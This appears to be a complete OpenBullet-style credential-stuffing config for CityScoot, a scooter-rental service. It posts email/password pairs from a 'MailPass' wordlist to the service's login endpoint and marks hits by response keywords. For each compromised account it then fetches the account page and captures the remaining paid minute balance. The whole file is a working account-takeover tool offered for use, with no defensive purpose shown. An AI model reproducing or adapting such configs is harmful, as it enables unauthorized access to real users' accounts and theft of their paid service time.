[SETTINGS]
{
  "Name": "City Scoot ( Capture )",
  "SuggestedBots": 10,
  "LastModified": "2018-07-05T17:11:38.4991665+00:00",
  "AdditionalInfo": "",
  "Author": "Marine",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://moncompte.cityscoot.eu/users/login" AutoRedirect=TRUE 
  CONTENT "_method=POST&email=<USER>&passwordV3=<PASS>&login_submit=Connexion" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://moncompte.cityscoot.eu/" 
  HEADER "origin: https://moncompte.cityscoot.eu" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Email ou mot de passe incorrect " 
  KEYCHAIN Success OR 
    KEY "<a href=\"/users/disconnect\" title=\"Se déconnecter\">Se déconnecter</a>" 
#GET_TIME REQUEST GET "https://moncompte.cityscoot.eu/produit-minutes/myminutes" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://moncompte.cityscoot.eu/" 
  HEADER "origin: https://moncompte.cityscoot.eu" 
#CAPTURE_SOLDE PARSE "<SOURCE>" LR "<div class=\"minutesPack_minutes\">" "min" Recursive=FALSE -> CAP "Solde de minutes" "" " min" 
